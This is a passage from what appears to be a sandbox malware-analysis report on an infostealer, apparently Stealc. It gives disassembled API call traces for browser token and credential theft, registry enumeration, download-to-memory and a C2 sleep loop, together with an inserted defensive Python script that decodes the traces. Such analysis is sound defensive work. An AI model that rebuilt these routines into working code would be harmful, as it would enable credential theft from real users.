                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID:
                                  • API String ID: 4017274736-0
                                  • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                  • Instruction ID: 50a4548b2ab4c15d9b3e8341d4de7ecc42de74cd4848995be7608fbb4be062fc
                                  • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                  • Instruction Fuzzy Hash: BD41D679A5031867CB50F7F0EC46FDD7739AB24701F8044A4B689660C4EEB857D88F92
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 022F8397
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022F839E
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 022F83BF
                                  • __aulldiv.LIBCMT ref: 022F83D9
                                  • __aulldiv.LIBCMT ref: 022F83E7
                                  • wsprintfA.USER32 ref: 022F8413
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: @
                                  • API String ID: 2774356765-2766056989
                                  • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                  • Instruction ID: 2d68da53c4ba1d969d834fcd5b3df6404f30349dff1adc3d4272adc9a355352d
                                  • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                  • Instruction Fuzzy Hash: AC2138B1E54218ABDB00DFD5DC49FAEFBB9FB44B04F104619F605BB284C7B869008BA5
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                  • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 1440504306-1079375795
                                  • Opcode ID: 5226a6c591d179b7e6389724377be7240f9668c20b1684fac7b0d54382ec3448
                                  • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                  • Opcode Fuzzy Hash: 5226a6c591d179b7e6389724377be7240f9668c20b1684fac7b0d54382ec3448
                                  • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: B
                                  • API String ID: 1494266314-2248957098
                                  • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                  • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                  • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                  • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                  APIs
                                  • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                  • memset.MSVCRT ref: 00409EE8
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                  • API String ID: 1977917189-1096346117
                                  • Opcode ID: 43ca3934b52a4446b4b6cf1fa4914ceec72bf29801e8da05ad35721471fe8544
                                  • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                  • Opcode Fuzzy Hash: 43ca3934b52a4446b4b6cf1fa4914ceec72bf29801e8da05ad35721471fe8544
                                  • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                  APIs
                                    • Part of subcall function 022E7537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022E75A1
                                    • Part of subcall function 022E7537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022E7618
                                    • Part of subcall function 022E7537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022E7674
                                    • Part of subcall function 022E7537: GetProcessHeap.KERNEL32(00000000,?), ref: 022E76B9
                                    • Part of subcall function 022E7537: HeapFree.KERNEL32(00000000), ref: 022E76C0
                                  • lstrcat.KERNEL32(0064A668,004217FC), ref: 022E786D
                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 022E78AF
                                  • lstrcat.KERNEL32(0064A668,00421800), ref: 022E78C1
                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 022E78F6
                                  • lstrcat.KERNEL32(0064A668,00421804), ref: 022E7907
                                  • lstrcat.KERNEL32(0064A668,00000000), ref: 022E793A
                                  • lstrcat.KERNEL32(0064A668,00421808), ref: 022E7954
                                  • task.LIBCPMTD ref: 022E7962
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                  • String ID:
                                  • API String ID: 2677904052-0
                                  • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                  • Instruction ID: 2939e9c7883b69d7bc3ff7d2ae94d0cc368a1a2341d43c68e786eb586915e3cc
                                  • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                  • Instruction Fuzzy Hash: A1314F75A50209EFDF04EBE0DC94DFEB776EB59301F505018E106672A4DA34A942DF62
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022E5231
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022E5238
                                  • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 022E5251
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 022E5278
                                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 022E52A8
                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 022E52F1
                                  • InternetCloseHandle.WININET(?), ref: 022E5320
                                  • InternetCloseHandle.WININET(?), ref: 022E532D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                  • String ID:
                                  • API String ID: 1008454911-0
                                  • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                  • Instruction ID: a8c2018a1be64044be499e83949fdde298d2854408df4f827856bee4c968367c
                                  • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                  • Instruction Fuzzy Hash: 6B3118B8A50218ABDB20CF94DC84BDCB7B5EB48704F5081D9F709A7284D7B46AC5CF98
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                  • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                  • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                  • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                  • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                  • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                  • InternetCloseHandle.WININET(?), ref: 004050C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                  • String ID:
                                  • API String ID: 3894370878-0
                                  • Opcode ID: 1dc63bcea8c89599eeebbab4266e6e891c5a7427e8975807a0a319ab44058970
                                  • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                  • Opcode Fuzzy Hash: 1dc63bcea8c89599eeebbab4266e6e891c5a7427e8975807a0a319ab44058970
                                  • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
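The function blocks above are raw API traces with every argument printed as eight hex digits, so the interesting facts (which registry hive is opened, which WinINet flags are passed, how large the heap buffer is, how long the C2 loop sleeps) have to be decoded by hand. The script below is an added example, not Joe Sandbox or Stealc code: it parses this report's own "APIs" listing format into per-function call lists, decodes the constants that matter against their Windows SDK values, and flags two of the behaviour patterns visible in this listing (the allocate-then-InternetOpenUrlA/InternetReadFile download-to-memory loop, and the HKLM value read used for the `Windows 11` / `CurrentBuildNumber` version check). The sample trace embedded in it is copied from three of the blocks on this page. One assumption is labelled in the code: because `GetProcessHeap` takes no parameters, the two stack slots the sandbox logs for it are read as the flags and size already pushed for the `HeapAlloc` that follows; that is an inference from the trace layout, not something the report states.

```python
# Added example (not Joe Sandbox or Stealc code): parse the "APIs" blocks above into
# per-function call lists, decode raw hex constants, flag two behaviour patterns.
import re
from dataclasses import dataclass

# Copied from three function blocks in this report so the script runs offline.
SAMPLE_TRACE = """\
APIs
• GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
• HeapAlloc.KERNEL32(00000000), ref: 00404FD1
• InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
• InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
• InternetCloseHandle.WININET(00415EDB), ref: 004050B9
Memory Dump Source
APIs
• RegOpenKeyExA.ADVAPI32(80000002,00885FA0,00000000,00020119,004176B9), ref: 0041775B
• RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
Memory Dump Source
APIs
  • Part of subcall function 022E64E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 022E6626
• Sleep.KERNEL32(0000EA60), ref: 022F5C82
Memory Dump Source
"""
CALL_RE = re.compile(
    r"•?\s*(?P<sub>Part of subcall function\s+[0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[^\s.(]+)\.\w+(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

@dataclass
class Call:
    name: str
    args: list          # 8-hex-digit tokens become int; '?' and literals stay str
    ref: int            # call-site address
    subcall: bool       # logged from a callee ("Part of subcall function ...")

# An argument is a number only when it is exactly eight hex digits (the sandbox's format).
_arg = lambda t: int(t.strip(), 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", t.strip()) else t.strip()

def parse_trace(text: str) -> list:
    funcs, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":                   # header that opens a function block
            funcs.append(cur := [])
        elif s == "Memory Dump Source":   # first line after the call list
            cur = None
        elif cur is not None and (m := CALL_RE.search(s)):
            raw = m.group("args")
            cur.append(Call(m.group("name"), [_arg(a) for a in raw.split(",")] if raw else [],
                            int(m.group("ref"), 16), bool(m.group("sub"))))
    return funcs

HKEYS = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
KEY_READ = 0x20019   # STANDARD_RIGHTS_READ | QUERY_VALUE | ENUMERATE_SUB_KEYS | NOTIFY
KEY_BITS = [(0x100, "KEY_WOW64_64KEY"), (0x200, "KEY_WOW64_32KEY")]
INET_FLAGS = [(0x04000000, "INTERNET_FLAG_NO_CACHE_WRITE"), (0x00800000, "INTERNET_FLAG_SECURE"),
              (0x00400000, "INTERNET_FLAG_KEEP_CONNECTION"), (0x00000100, "INTERNET_FLAG_PRAGMA_NOCACHE")]
INET_OPTIONS = {31: "INTERNET_OPTION_SECURITY_FLAGS"}   # option 0x1F

def _bits(value: int, table) -> str:
    names = [n for bit, n in table if value & bit]
    rest = value & ~sum(bit for bit, _ in table)
    return "|".join(names + ([hex(rest)] if rest else [])) or "0"

def decode_key_access(sam: int) -> str:
    base = ["KEY_READ"] if sam & KEY_READ == KEY_READ else []
    extra = _bits(sam & ~KEY_READ if base else sam, KEY_BITS)
    return "|".join(base + ([extra] if extra != "0" else [])) or "0"

def decode_call(c: Call) -> list:
    # Readable notes for the constants the sandbox prints as raw hex.
    hx = lambda i: c.args[i] if i < len(c.args) and isinstance(c.args[i], int) else None
    if c.name.startswith("RegOpenKeyEx") and hx(3) is not None:
        return [f"root={HKEYS.get(hx(0), 'handle')}", f"samDesired={decode_key_access(hx(3))}"]
    if c.name == "InternetOpenUrlA" and hx(4) is not None:
        return ["dwFlags=" + _bits(hx(4), INET_FLAGS)]
    if c.name == "InternetSetOptionA" and hx(1) is not None:
        return ["dwOption=" + INET_OPTIONS.get(hx(1), hex(hx(1)))]
    if c.name == "Sleep" and hx(0) is not None:
        return [f"{hx(0)} ms ({hx(0) / 1000:.1f} s)"]
    if c.name == "GetProcessHeap" and hx(1) is not None:
        # Assumption: GetProcessHeap has no parameters, so the logged slots are the
        # flags/size already pushed for the HeapAlloc that immediately follows.
        return [f"next HeapAlloc size (inferred)={hx(1):,} bytes"]
    return []

def classify(calls: list) -> set:
    names, labels = [c.name for c in calls], set()
    it = iter(names)   # one shared iterator makes the all/any an ordered-subsequence check
    if {"HeapAlloc", "RtlAllocateHeap", "LocalAlloc"} & set(names) and all(
            any(n == p for n in it) for p in
            ("InternetOpenA", "InternetOpenUrlA", "InternetReadFile", "InternetCloseHandle")):
        labels.add("download_to_memory")
    if "RegQueryValueExA" in names and any(
            c.name == "RegOpenKeyExA" and c.args[:1] == [0x80000002] for c in calls):
        labels.add("hklm_value_read")
    return labels

if __name__ == "__main__":
    for i, calls in enumerate(parse_trace(SAMPLE_TRACE)):
        print(i, sorted(classify(calls)), [decode_call(c) for c in calls if decode_call(c)])
```

Run against the copied lines, the decoder turns the numbers in this report into the facts a responder wants: the heap buffer requested before `InternetOpenUrlA` is 99,999,999 bytes (0x05F5E0FF), the download runs in 0x400-byte `InternetReadFile` chunks, `InternetOpenUrlA` is called with `INTERNET_FLAG_NO_CACHE_WRITE|INTERNET_FLAG_PRAGMA_NOCACHE` (0x04000100), the version lookup opens `HKEY_LOCAL_MACHINE` with `KEY_READ|KEY_WOW64_64KEY` (0x20119, so this 32-bit sample deliberately reads the 64-bit registry view), `InternetSetOptionA` sets option 0x1F (`INTERNET_OPTION_SECURITY_FLAGS`; the flag value itself is not captured, it shows as `?`), and the C2 loop's `Sleep(0xEA60)` is a 60-second delay. Only constants whose meaning is fixed by the SDK are decoded; anything that is a pointer or an unresolved `?` is left as-is rather than guessed.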
                                  APIs
                                    • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                    • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                  • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 022F58AB
                                  • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 022F5908
                                  • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 022F5ABE
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022F5457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 022F548F
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022F5527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022F557F
                                    • Part of subcall function 022F5527: lstrlen.KERNEL32(00000000), ref: 022F5596
                                    • Part of subcall function 022F5527: StrStrA.SHLWAPI(00000000,00000000), ref: 022F55CB
                                    • Part of subcall function 022F5527: lstrlen.KERNEL32(00000000), ref: 022F55EA
                                    • Part of subcall function 022F5527: strtok.MSVCRT(00000000,?), ref: 022F5605
                                    • Part of subcall function 022F5527: lstrlen.KERNEL32(00000000), ref: 022F5615
                                  • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 022F59F2
                                  • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 022F5BA7
                                  • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 022F5C73
                                  • Sleep.KERNEL32(0000EA60), ref: 022F5C82
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleepstrtok
                                  • String ID:
                                  • API String ID: 3630751533-0
                                  • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                  • Instruction ID: 688620f2968f751a2717c213b2df6fcde1427aaefe87c9250c7e18e4c4253aae
                                  • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                  • Instruction Fuzzy Hash: 0DE11071920304AACB58FBE0DD96DEDF37AAF55700F808178A60A66198EF345B5CCF91
                                  APIs
                                  • memset.MSVCRT ref: 022E158E
                                    • Part of subcall function 022E1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E151B
                                    • Part of subcall function 022E1507: RtlAllocateHeap.NTDLL(00000000), ref: 022E1522
                                    • Part of subcall function 022E1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022E153E
                                    • Part of subcall function 022E1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022E155C
                                    • Part of subcall function 022E1507: RegCloseKey.ADVAPI32(?), ref: 022E1566
                                  • lstrcat.KERNEL32(?,00000000), ref: 022E15B6
                                  • lstrlen.KERNEL32(?), ref: 022E15C3
                                  • lstrcat.KERNEL32(?,004262EC), ref: 022E15DE
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                    • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 022E16CC
                                    • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                    • Part of subcall function 022E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022E9C53
                                    • Part of subcall function 022E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022E9C78
                                    • Part of subcall function 022E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022E9C98
                                    • Part of subcall function 022E9C27: ReadFile.KERNEL32(000000FF,?,00000000,022E16F6,00000000), ref: 022E9CC1
                                    • Part of subcall function 022E9C27: LocalFree.KERNEL32(022E16F6), ref: 022E9CF7
                                    • Part of subcall function 022E9C27: CloseHandle.KERNEL32(000000FF), ref: 022E9D01
                                  • DeleteFileA.KERNEL32(00000000), ref: 022E1756
                                  • memset.MSVCRT ref: 022E177D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                  • String ID:
                                  • API String ID: 3885987321-0
                                  • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                  • Instruction ID: ec0ae5f51aa62174a407ebcbfa03b32d5cac057fa9c474fdf387058e8e41fc6b
                                  • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                  • Instruction Fuzzy Hash: CB514DB19603189BCB59FBA0DD91EEDB37AAF54700F4041B8A70E62184EE345B89CF95
                                  APIs
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                  • wsprintfA.USER32 ref: 00418459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                  • RegQueryValueExA.ADVAPI32(00000000,0088AB70,00000000,000F003F,?,00000400), ref: 004184EC
                                  • lstrlenA.KERNEL32(?), ref: 00418501
                                  • RegQueryValueExA.ADVAPI32(00000000,0088AAE0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 3896182533-4073750446
                                  • Opcode ID: 33bb1e120011f456fd0d00ec002cc8eb811bbe50be437bcb910910415e41be60
                                  • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                  • Opcode Fuzzy Hash: 33bb1e120011f456fd0d00ec002cc8eb811bbe50be437bcb910910415e41be60
                                  • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                                  Strings
                                  Memory Dump Source
